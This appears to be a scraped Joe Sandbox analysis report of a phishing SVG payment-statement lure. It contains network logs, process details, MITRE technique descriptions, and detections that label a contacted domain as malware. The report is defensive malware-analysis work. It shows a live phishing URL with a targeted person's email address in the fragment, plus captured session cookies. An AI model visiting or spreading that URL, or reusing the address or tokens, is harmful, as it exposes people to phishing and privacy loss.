28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)\|\|(i=S.attrHooks[t.toLowerCase()]\|\|(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
2025-03-25 18:33:55 UTC	7581	IN	Data Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52 Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain\|\|e["X-Requested-With"]\|\|(e["X-R

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49692	104.21.65.232	443	4376	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 18:33:55 UTC	1325	OUT	GET /favicon.ico HTTP/1.1 Host: zak9.rnltvipi.es Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://zak9.rnltvipi.es/ebY7FU/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: XSRF-TOKEN=eyJpdiI6ImdwU3ZTazNGYXFOQTR6WDlSNXlNalE9PSIsInZhbHVlIjoiYXlJTys5dnAyUGJJaUFaclNnSFBuQlc0eVdyendhMzg2MWxXcVEraWpnbm1uenBDcTRUNXNXZjZ6VUhoUWtOSEMzcXJ2V1FKaDdUVlU0MlVMUjBCNVFUbCtGVXZabktWaXBBMElOdmN6a21tZVFJOUlqNTVxMnBZUXB3OFd0cDAiLCJtYWMiOiJhNmI0ODdmMDc0Njc4MGViYjIwMTI2MGY2MGE4OWIxNDcxMzZlNWY2YTNjOGY0MmVmYWZmYjM5YmE0NzJmOTA4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhLdlVUbHlPOWZRL1FzTGtUanUyK2c9PSIsInZhbHVlIjoiMGRQbVIxMnU5NEtjSDZScktPamtCS2dtenhaZnRCbENleko3ejZmbllHRDZNdFpIbkFnQWxTdE9Zdlp4UWtJY01tZ0JyS253SktKbFYxSURVSkNpaEZQNFpNYVhEZCtudVV0QTBFOFlqSXNGcjZ0Smh0bldxeXpWZ2V1eUtURXQiLCJtYWMiOiI0Y2VlM2EzZjBkYTA4NzhiM2IxOWNjZTk4YzZmMThlMjFjZDBhOWI2MzI1NWI0NWU2MDk4OGE3MjU3OGNkNTQ2IiwidGFnIjoiIn0%3D
2025-03-25 18:33:55 UTC	1060	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Mar 2025 18:33:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lx06xBzWPo7%2F9kbsdxXpBkWA9qHIfLP%2BZVozx%2BU9JOqiuJxW%2Bgbclie2fL9XDcxVojG15W7SQ6mXxNayZbDk8ClMULOyKGV2Ti2B3CJklyx9ACBz7iE13yQLjHrm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding server-timing: cfL4;desc="?proto=TCP&rtt=33234&min_rtt=33122&rtt_var=12501&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2231&delivery_rate=85985&cwnd=174&unsent_bytes=0&cid=3d286432d41f76b0&ts=57&x=0" Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Server: cloudflare CF-RAY: 92607fd9de5f4286-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=104164&min_rtt=103583&rtt_var=22727&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1897&delivery_rate=35360&cwnd=210&unsent_bytes=0&cid=5808ab6a3e836fc2&ts=3254&x=0"
2025-03-25 18:33:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49701	35.190.80.1	443	4376	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 18:33:56 UTC	535	OUT	OPTIONS /report/v4?s=Lx06xBzWPo7%2F9kbsdxXpBkWA9qHIfLP%2BZVozx%2BU9JOqiuJxW%2Bgbclie2fL9XDcxVojG15W7SQ6mXxNayZbDk8ClMULOyKGV2Ti2B3CJklyx9ACBz7iE13yQLjHrm HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://zak9.rnltvipi.es Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 18:33:56 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: OPTIONS, POST access-control-allow-origin: * access-control-allow-headers: content-type, content-length date: Tue, 25 Mar 2025 18:33:56 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49702	35.190.80.1	443	4376	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 18:33:57 UTC	510	OUT	POST /report/v4?s=Lx06xBzWPo7%2F9kbsdxXpBkWA9qHIfLP%2BZVozx%2BU9JOqiuJxW%2Bgbclie2fL9XDcxVojG15W7SQ6mXxNayZbDk8ClMULOyKGV2Ti2B3CJklyx9ACBz7iE13yQLjHrm HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 429 Content-Type: application/reports+json Origin: https://zak9.rnltvipi.es User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 18:33:57 UTC	429	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 34 30 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 7a 61 6b 39 2e 72 6e 6c 74 76 69 70 69 2e 65 73 2f 65 62 59 37 46 55 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 36 35 2e 32 33 32 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 Data Ascii: [{"age":0,"body":{"elapsed_time":400,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://zak9.rnltvipi.es/ebY7FU/","sampling_fraction":1.0,"server_ip":"104.21.65.232","status_code":404,"type":"http.error"},"type":"network-error"
2025-03-25 18:33:57 UTC	214	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-allow-origin: * vary: Origin date: Tue, 25 Mar 2025 18:33:56 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Statistics

CPU Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Memory Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Click to jump to process

Target ID:	0
Start time:	14:33:43
Start date:	25/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff778810000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	14:33:44
Start date:	25/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2080,i,16744422114225606758,16492851853540708457,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2116 /prefetch:3
Imagebase:	0x7ff778810000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	14:33:51
Start date:	25/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\34209QB_EFT_Payment_Statemt25.svg"
Imagebase:	0x7ff778810000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Source: https://zak9.rnltvipi.es/ebY7FU/	Avira URL Cloud: Label: malware
Source: https://zak9.rnltvipi.es/favicon.ico	Avira URL Cloud: Label: malware

Source: 1.3..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://zak9.rnltvipi.es/ebY7FU/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script appears to be attempting to redirect the user to a suspicious domain and collect sensitive information, which is a clear indication of malicious intent.
Source: 1.7..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://zak9.rnltvipi.es/ebY7FU/... This script demonstrates high-risk behaviors, including dynamic code execution through the use of a Proxy object that evaluates decoded strings. The obfuscated nature of the code and the potential for remote code execution make this a high-risk script.

Source: https://zak9.rnltvipi.es/ebY7FU/#Rcbeaty@hilcorp.com	HTTP Parser: No favicon
Source: https://zak9.rnltvipi.es/ebY7FU/#Rcbeaty@hilcorp.com	HTTP Parser: No favicon

Source: Joe Sandbox View	IP Address: 151.101.194.137 151.101.194.137
Source: Joe Sandbox View	IP Address: 151.101.194.137 151.101.194.137

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Source: Yara match	File source: 1.2.d.script.csv, type: HTML
Source: Yara match	File source: 1.0.pages.csv, type: HTML
Source: Yara match	File source: 1.1.pages.csv, type: HTML

Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.215.203
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.98.62
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.227
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.227
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.227
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.227
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.227
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.15
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.15
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.15
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.15
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.15
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.15
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.15
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.227
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.227
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ebY7FU/ HTTP/1.1Host: zak9.rnltvipi.esConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://zak9.rnltvipi.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: zak9.rnltvipi.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zak9.rnltvipi.es/ebY7FU/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImdwU3ZTazNGYXFOQTR6WDlSNXlNalE9PSIsInZhbHVlIjoiYXlJTys5dnAyUGJJaUFaclNnSFBuQlc0eVdyendhMzg2MWxXcVEraWpnbm1uenBDcTRUNXNXZjZ6VUhoUWtOSEMzcXJ2V1FKaDdUVlU0MlVMUjBCNVFUbCtGVXZabktWaXBBMElOdmN6a21tZVFJOUlqNTVxMnBZUXB3OFd0cDAiLCJtYWMiOiJhNmI0ODdmMDc0Njc4MGViYjIwMTI2MGY2MGE4OWIxNDcxMzZlNWY2YTNjOGY0MmVmYWZmYjM5YmE0NzJmOTA4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhLdlVUbHlPOWZRL1FzTGtUanUyK2c9PSIsInZhbHVlIjoiMGRQbVIxMnU5NEtjSDZScktPamtCS2dtenhaZnRCbENleko3ejZmbllHRDZNdFpIbkFnQWxTdE9Zdlp4UWtJY01tZ0JyS253SktKbFYxSURVSkNpaEZQNFpNYVhEZCtudVV0QTBFOFlqSXNGcjZ0Smh0bldxeXpWZ2V1eUtURXQiLCJtYWMiOiI0Y2VlM2EzZjBkYTA4NzhiM2IxOWNjZTk4YzZmMThlMjFjZDBhOWI2MzI1NWI0NWU2MDk4OGE3MjU3OGNkNTQ2IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic	HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: zak9.rnltvipi.es
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 34209QB_EFT_Payment_Statemt25.svg

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Malware Analysis System Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 55

Chrome Cache Entry: 56

Chrome Cache Entry: 57

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 5632, Parent PID: 1716

General

File Activities

File Opened

File Created

File Deleted

Windows Analysis Report
34209QB_EFT_Payment_Statemt25.svg